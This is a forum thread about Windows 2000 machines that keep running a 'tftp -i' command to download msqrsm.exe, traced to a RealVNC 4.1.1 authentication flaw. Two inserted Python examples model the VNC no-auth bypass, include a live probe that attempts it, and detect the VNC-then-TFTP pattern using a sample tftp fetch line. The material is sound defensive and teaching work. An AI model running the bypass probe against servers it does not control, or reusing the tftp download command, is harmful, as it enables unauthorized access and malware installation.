DOS (tftp) virus

Hi,

Not sure if anyone has encountered this virus and whether there is a fix. This virus has attacked my wife’s W2K Pro notebook (all security updates etc. up to date) running ZoneAlarm (home free - all updates up to date) and avast (home/free edition - all updates up to date).

Periodically, the WINx (cmd) gets executed - the (cmd) black box comes up and the command [ tftp -i xxx.xxx.xxx.xxxx msqrsm.exe ] is run, and a short while later it tries to run msqrsm. The IP address is different each time this happens. I had already renamed the tftp command so it never gets executed and hence the pgm doesn’t get downloaded.

How do I find which program or service is the culprit (may be a valid winx service that was compromised??) and stop this nonsense from continuing??

A bit of background - I had noticed that her computer was acting erratically so I rebooted with a clean WINX LIVE CD and did a complete clean with avast of her HDD and in fact found several pgms that had been hit by a virus - the identified pgms were deleted - I then proceeded to clean the registry of the bad items - and did a manual cleanup of some dirs found in “program files” - the culprit seems to have been gray_pigeon_hacker.com.

Also, if possible, can anyone shed light on how this virus was able to infect even through ZoneAlarm and avast (BTW: she also runs SpywareBlaster and Spybot Search & Destroy)?? (So I can prevent this from happening again!!)

Thanks for any help in this regard.

Rgds. Otto.

I can confirm this experience: my daughter’s desktop PC, Windows 2000, suddenly did the same and she managed to take some notes which I am deciphering. I have only just found this forum item with msqrsm:exe (I have deliberately inserted the colon).

However, in our case an attempt was also made to download the program msinexecs:exe, of which I have been unable to find much information. Some hints found on a Norwegian site.

The PC runs Sygate Personal Firewall, AVG Free, Ad-Aware, Spybot Search & Destroy. So far we don’t think we have found anything about where it originates.

Date noticed 19th or 20th September, in Belgium

I ask the same question, how can it get ‘out’ with the firewall running and giving no notice.

C

Hi aplcom and cylosine. Welcome to the forums.

@aplcom

There is information about msqrsm.exe here

http://virusinfo.prevx.com/pxparall.asp?PXC=e36042251362

@cylosine

I think msinexecs.exe might be related to this

http://fileinfo.prevx.com/fileinfo.asp?PXC=0e5033782633

You could both try the trial version of Prevx that you can download from

http://www.prevx.com/

The two options on the web page, “Clean and Protect My PC Now” and “Protect My PC Now” download the same file afaik.

A word of caution - Prevx is a powerful program and, because of this, it uses a lot of resources when running. In addition to removing some malware it’s also an IPS (intrusion prevention software) so it will sometimes block programs you want to run, or stop and ask if you want to allow a program to run. This can be annoying. But its software database, which is built on user input, is quite extensive so it will recognize most programs it encounters.

EDIT: BTW, aplcom, did avast! find and clean RBOT on your wife’s computer?

Hi Mauserme,

Thanks for the info. I will try the prevx stuff and see if that clears it up - else I may have no choice but to re-install (my last option!!).

I searched and looked for RBOT but saw no signs of it - unless you are referring to something else. When I ran from a clean ‘LIVE WIN CD’ it did clean up several programs that were attacked - I will upload the list once I get my hands on her computer (currently I’m on contract in Singapore and she is in HK !!) within the next few days.

I am still very curious how all this came about - running ZONEALARM & AVAST - how did her computer get infected. Was it via an email? or by visiting a website? or did someone simply target an attack on her IP and somehow compromised insecure aspects of WIN2000PRO??

Again thanks for the replies and helping cure this ill.

Rgds. Otto.

Hi,

I managed to access my wife’s computer via VNC, and guess what? - Prevx found 3 files that were virused - in system32 it found (shell32.exe, kernel32.exe and dc1.exe) - it cleaned them up. I then found these same entries in the registry (run as services and also in explorer bars) and proceeded to delete them. Seems that all is back to normal.

Surprised that AVAST did not catch these files - even after I scanned them manually!!

Again thanks to mauserme.

Rgds. otto.

You’re welcome Otto. I’m glad it worked out this easily.

I don’t know if you noticed on the Prevx page, this was first seen in their community on September 17. Avast! probably does not have a signature yet (if you have it in the Prevx quarantine and you’re adventuresome you could send a sample).

As far as how it got past ZA, my guess is that it’s disguising itself as an allowed program or possibly, if it uses a name like IEXPLORE.EXE, your wife might have allowed the connection when ZA asked.

Keith

Hi Mauserme,

This link helped me get some more information , I am struggling to find much:
http://virusinfo.prevx.com/pxparall.asp?PXC=e36042251362

This link does not convince me it has to do with msinexecs.exe:
http://fileinfo.prevx.com/fileinfo.asp?PXC=0e5033782633

The info from aplcom is very interesting; looking at the files shows you don’t want to have them on your computer. The 3 files named are well known as bad ones; surprising that scanning with AVAST has not brought them to light. I do however know nothing much about AVAST. If these files are involved in our case it means that AVG cannot find them either.

I have however not been able to convince myself that any of the file names I have seen are the original cause of the present problem; I see them as the result of another program having been started.

Which one or ones it is remains completely unclear; I will wait patiently to see what emerges from the Internet.

C.

Hi cylosine,

The connection between msinexecs.exe and the Prevx link I posted in my response to you was actually drawn by Prevx rather than me.

http://fileinfo.prevx.com/fileinfoweek.asp?mk=24/07/2006


http://img125.imageshack.us/img125/7158/prevxpagehz1.png

Waiting for additional information to become available may be a good approach because, as you say, there is very little on the web at the moment. You could also post a HijackThis log and we could ask Eddy to take a look.

Hi mauserme,

I went back to prevx once more and had much more luck.
http://fileinfo.prevx.com/adware/qqccf340481465-msin23040165/msinexecs.exe.html

Others interested: go to the same place and use the search facility to find more msinexecs.exe files; there is a heap of variations. Bad news is that it is a heavy duty version that is about at the moment.

Found enough information to convince myself that a bot controller is hanging around somewhere and has managed to fool our firewall.

HJT shows nothing, experts have looked and I have compared with a previous clear report and could not see anything suspicious.

The computer is in another continent so I have limited access, it is going to be a drawn out affair. I will report back as it goes on.

Found enough information to convince myself that a bot controller is hanging around somewhere and has managed to fool our firewall.

I didn’t notice you mentioned what firewall you use ?

Hardware firewalls don’t usually provide outbound protection, nor does Windows XP’s firewall.
Any malware that manages to get past your defences will have free rein to connect to the internet to either download more of the same, pass your personal data (sensitive or otherwise: user names, passwords, keylogger retrieved data, etc.) or open a backdoor to your computer, so outbound protection is essential.

HJT shows nothing, experts have looked and I have compared with a previous clear report and could not see anything suspicious.
Might be time for a look at Hidden things [url]http://invisiblethings.org[/url]

Maybe its just me but I still think its worth giving Prevx a try. From the url you posted, cylosine

“New Users: You can download the full Prevx1 product and use it to cleanup and remove MSINEXECS.EXE and other infections free of charge …”

I liked this program when it was a freeware.
I hate freewares becoming shareware.
I don’t trust (or like) companies that use this marketing policy.
Maybe it’s just me 8)

Waving with my hand…no Tech, it’s not just you :slight_smile: I also don’t like it

@DavidR,
I did mention the firewall right at the beginning, Sygate Personal Firewall (the free version) has been very handy. Your comments are correct and a bit disheartening. SPF certainly picks up two way traffic.

@mauserme,
I am contemplating Prevx and I did notice the offer. Just reluctant to use yet another.

Hi Mauserme (Keith),

Seems that I was barking up the wrong tree all along. The PREVX1 idea was good and it did help. However, after my (premature) posting that all was well, the darn DOS box popped up again and the tftp -i command started mysteriously executing again.

I finally got fed up and used ethereal to monitor the network and FINALLY found the culprit. Remember I said I fixed my wife’s computer via VNC - well guess what?? RealVNC (v4.1.1) had a security flaw in it and it was able to be compromised. Once I upgraded to v4.1.2 (flaw corrected) the problem has disappeared for good!!! Check out this site for more info.

http://www.intelliadmin.com/blog/2006/05/vnc-flaw-proof-of-concept.html

Again, much thanks Keith for your help and time.

Rgds. Otto.
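
The following is an added example, not code from the thread or from RealVNC. It models the RFB 3.8 security-type negotiation that Otto's post above refers to, so the behaviour can be seen concretely: the server advertises a list of security types (here only VNC Authentication), the client answers with one byte, and a correct server must reject a choice it never offered. The `enforce=False` path models the RealVNC 4.1.1 behaviour described in the linked proof of concept, where the client's choice of type None (1) was honoured even though only type 2 had been offered. `probe_auth_bypass` performs the same check against a live server and is meant only for servers you are responsible for; the constants come from the RFB protocol specification, and the function and parameter names are this example's own.

```python
"""RFB 3.8 security negotiation: correct server behaviour vs. the RealVNC 4.1.1
auth-bypass behaviour, plus a live probe for your own servers. Added example."""
import socket
import struct

# Security type values from the RFB protocol specification.
SEC_INVALID = 0
SEC_NONE = 1        # no authentication at all
SEC_VNC_AUTH = 2    # DES challenge/response on the VNC password


def select_security_type(offered, chosen, enforce=True):
    """Server-side decision after the client sends its one-byte choice.

    offered  - tuple of types the server advertised
    chosen   - the byte the client sent back
    enforce  - True: correct behaviour, reject anything not offered.
               False: model of the 4.1.1 flaw, honour the client's choice blindly.
    Returns the type to proceed with, or None if the connection must be dropped.
    """
    if enforce and chosen not in offered:
        return None
    return chosen


def parse_client_choice(server_offer_msg, client_reply):
    """Decode the on-wire messages: server sends [count][type...], client sends [type]."""
    count = server_offer_msg[0]
    offered = tuple(server_offer_msg[1:1 + count])
    chosen = client_reply[0]
    return offered, chosen


def handshake_outcome(server_offer_msg, client_reply, enforce=True):
    """Classify a captured negotiation: 'rejected', 'vnc-auth' or 'no-auth'.
    'no-auth' with the server having offered only VNC Auth is the bypass."""
    offered, chosen = parse_client_choice(server_offer_msg, client_reply)
    result = select_security_type(offered, chosen, enforce)
    if result is None:
        return "rejected"
    if result == SEC_VNC_AUTH:
        return "vnc-auth"
    if result == SEC_NONE:
        return "no-auth"
    return "other"


def probe_auth_bypass(host, port=5900, timeout=5.0):
    """Ask a live server for type None when it did not offer it.
    Returns True if the server answers SecurityResult OK (vulnerable behaviour),
    False if it refuses or closes the connection. Use only on systems you own."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        banner = s.recv(12)
        if not banner.startswith(b"RFB "):
            raise ValueError("not an RFB server: %r" % banner)
        s.sendall(b"RFB 003.008\n")
        count_byte = s.recv(1)
        if not count_byte or count_byte[0] == 0:
            return False                      # server refused the connection outright
        offered = tuple(s.recv(count_byte[0]))
        if SEC_NONE in offered:
            return False                      # no bypass needed; server has no auth configured
        s.sendall(bytes([SEC_NONE]))
        result = s.recv(4)                    # RFB 3.8 SecurityResult: u32, 0 = OK
        return len(result) == 4 and struct.unpack(">I", result)[0] == 0


if __name__ == "__main__":
    # Constructed handshake: server offers only VNC Auth, client picks None.
    offer = bytes([1, SEC_VNC_AUTH])
    reply = bytes([SEC_NONE])
    print("correct server :", handshake_outcome(offer, reply, enforce=True))
    print("4.1.1 behaviour:", handshake_outcome(offer, reply, enforce=False))
```

Run against a capture of the handshake, the two bytes that matter are the server's offer list and the client's single reply byte; a reply that is not in the list, followed by a SecurityResult of 0 rather than a dropped connection, is the signature of the flaw.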

Hi aplcom,

Congratulations!! 8) The last thing I would have focused on.

Great piece of work. My daughter at the time with 95% probability was running the vnc4.1.1 server to allow me to log in. Great mistake starting it up with the computer, as we rarely use it, but I thought it was safe, so when I saw it running a few weeks ago when in Europe I did not think much about it. I had been wondering whether you would come back and tell us that you still had the problem; I did not feel confident this was the cause you were finding, but I did not know enough to question your finding.

Naturally vnc is set to go through the firewall. I feel much better apart from the stupid thing of letting vnc run needlessly but of course the idea was I can connect whenever she is on line.

Did you work out from the packet sniffing where the origin IP of the controller was? By the way, I am no expert on packet sniffing; I only have the program and used it trying to figure out why my IP phone would not connect to another IP address on the same ISP network (IP direct to IP, no middleman).

Many thanks for coming to the forum sharing your information. I feel much relieved on this occasion. Will update and rename tftp as well.

C.

Very nice indeed, Otto. Thanks for the update.

Hi Cylosine,

I used ethereal to monitor the traffic once the run command was executed - then analysed the packet data offline. I was able to see that it was port 5900 (VNC) that was being compromised (thankfully not in full screen mode - rather strictly in command mode!!!), hence the culprit was trying to further compromise the system by downloading the worm programs and backdoors. This is a relatively new exploit so thankfully no damage was done.

I did do a trace back and found the offending IP - reported it plus the logs to the ISP - but I doubt that anything will come of it. It’s a hacker’s world!!! (At least on Win-x machines - I have no probs whatsoever on my Linux boxes!!!)

It is a good idea to rename or move programs like ftp, tftp, cmd.exe (or simply lock them altogether). Also a good idea to do a thorough check with AVAST as well as PREVX1 (thanks to Keith!!). You can also check out nmap as well as grc.com to check what can get through your computer IP & ports.

Good luck and hope this also solves your problem.

Rgds. Otto.
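
The correlation Otto describes above, an inbound VNC connection followed shortly by the victim pulling a file over TFTP, is easy to automate once the capture is exported one packet per line. The following is an added example, not code from the thread; the packet summary is constructed to resemble an ethereal/tshark one-line export (epoch time, src:port -> dst:port, protocol), and the addresses, window size and function names are this example's own choices. It also includes a matcher for the `tftp -i <host> [GET] <file>` command line from the first post, for anyone correlating process creation logs instead of packets.

```python
"""Correlate inbound VNC (TCP/5900) with a following outbound TFTP (UDP/69)
from the same host, and recognise the tftp -i fetch command. Added example."""
import re
from collections import defaultdict

VNC_PORT = 5900
TFTP_PORT = 69

# Constructed capture summary, not from the thread. Host 192.168.1.20 receives a
# VNC connection from 203.0.113.45 and 12.8 s later fetches something over TFTP
# from 198.51.100.7. The last TFTP line is unrelated (far outside the window).
SAMPLE_CAPTURE = """\
1158739200.10 203.0.113.45:3321 -> 192.168.1.20:5900 TCP
1158739200.35 192.168.1.20:5900 -> 203.0.113.45:3321 TCP
1158739212.90 192.168.1.20:1054 -> 198.51.100.7:69 UDP
1158739213.02 198.51.100.7:69 -> 192.168.1.20:1054 UDP
1158740000.00 192.168.1.20:1060 -> 192.168.1.1:53 UDP
1158740500.00 192.168.1.20:1061 -> 198.51.100.9:69 UDP
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+):(\d+)\s+->\s+(\S+):(\d+)\s+(TCP|UDP)$")


def parse_capture(text):
    """Turn summary lines into (ts, src, sport, dst, dport, proto) tuples; skip junk lines."""
    pkts = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, src, sport, dst, dport, proto = m.groups()
        pkts.append((float(ts), src, int(sport), dst, int(dport), proto))
    return pkts


def correlate_vnc_then_tftp(pkts, window=300.0):
    """Alert when a host that accepted a VNC connection starts a TFTP transfer
    within `window` seconds. Returns one dict per suspicious TFTP request."""
    vnc_inbound = defaultdict(list)            # victim ip -> [(ts, remote ip)]
    for ts, src, sport, dst, dport, proto in pkts:
        if proto == "TCP" and dport == VNC_PORT:
            vnc_inbound[dst].append((ts, src))

    alerts = []
    for ts, src, sport, dst, dport, proto in pkts:
        if proto == "UDP" and dport == TFTP_PORT:
            prior = [(t, r) for t, r in vnc_inbound.get(src, ()) if 0 <= ts - t <= window]
            if prior:
                t0, remote = max(prior)        # most recent VNC connection before the fetch
                alerts.append({
                    "victim": src,
                    "vnc_client": remote,
                    "tftp_server": dst,
                    "delay_s": round(ts - t0, 2),
                })
    return alerts


# Matches the command from the first post, with or without the explicit GET verb.
TFTP_CMD_RE = re.compile(r"\btftp(?:\.exe)?\s+-i\s+(\S+)\s+(?:get\s+)?(\S+)", re.IGNORECASE)


def parse_tftp_fetch(cmdline):
    """Return (server, filename) if a command line is a binary-mode tftp fetch, else None."""
    m = TFTP_CMD_RE.search(cmdline)
    return (m.group(1), m.group(2)) if m else None


if __name__ == "__main__":
    for alert in correlate_vnc_then_tftp(parse_capture(SAMPLE_CAPTURE)):
        print("VNC-then-TFTP:", alert)
    # Constructed command line in the shape reported in the thread.
    print(parse_tftp_fetch("cmd /c tftp -i 198.51.100.7 GET msqrsm.exe"))
```

The window is deliberately short: in the thread the download followed the VNC session by seconds, and a longer window mostly adds noise from legitimate TFTP (PXE, network gear) on the same host. Outbound UDP/69 from a workstation is worth a low-severity alert on its own even without the preceding VNC connection.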

I hate that too. But it’s still a good program, imo, even if the marketing strategy stinks :slight_smile:

Other programs could do the same or better being freeware (or, at least, having a Lite or free version).
For instance: System Safety Monitor (http://syssafety.com/) :slight_smile: